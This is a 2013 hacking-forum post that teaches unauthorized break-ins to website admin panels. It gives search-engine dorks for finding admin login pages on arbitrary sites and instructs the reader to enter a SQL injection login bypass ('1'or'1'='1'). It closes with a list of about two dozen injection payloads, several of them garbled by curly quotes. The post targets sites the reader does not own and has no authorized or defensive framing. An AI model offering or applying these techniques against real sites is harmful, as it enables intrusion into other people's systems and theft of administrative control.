Home of WhiteHat CyberArmy
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Hacking Admin Account

Go down 
AuthorMessage
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: Hacking Admin Account   Tue Nov 12, 2013 12:38 pm

We're gonna hack into an admin account, using SQL injections.

How does it work: A SQL injection injects a code into the MYSQL database which gets passed the site security login.

Dorks:
Code:
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx
Step 1: Go to [You must be registered and logged in to see this link.] type in ''admin/login.asp site:net'' and search (You can also use the option, to search only in your country).
[You must be registered and logged in to see this image.]

Step 2: As you already can see in the first picture, we are looking for websites that look like this: example ''website.com/admin/login.asp''.


Step 3: Go to the website admin login page, type in:
Code:
username: 1'or'1'='1
password: 1'or'1'='1
[You must be registered and logged in to see this image.]

DONE! WE ARE NOW LOGGED AS ADMINISTRATOR !

[You must be registered and logged in to see this image.]

Other Injection Queries:
Code:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
Back to top Go down
View user profile http://whitehatcyberarmy.pro-forums.co.uk
 
Hacking Admin Account
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical WhiteHat CyberArmy :: WhiteHat CyberArmy Community :: Hacking & Security Tutorials-
Jump to: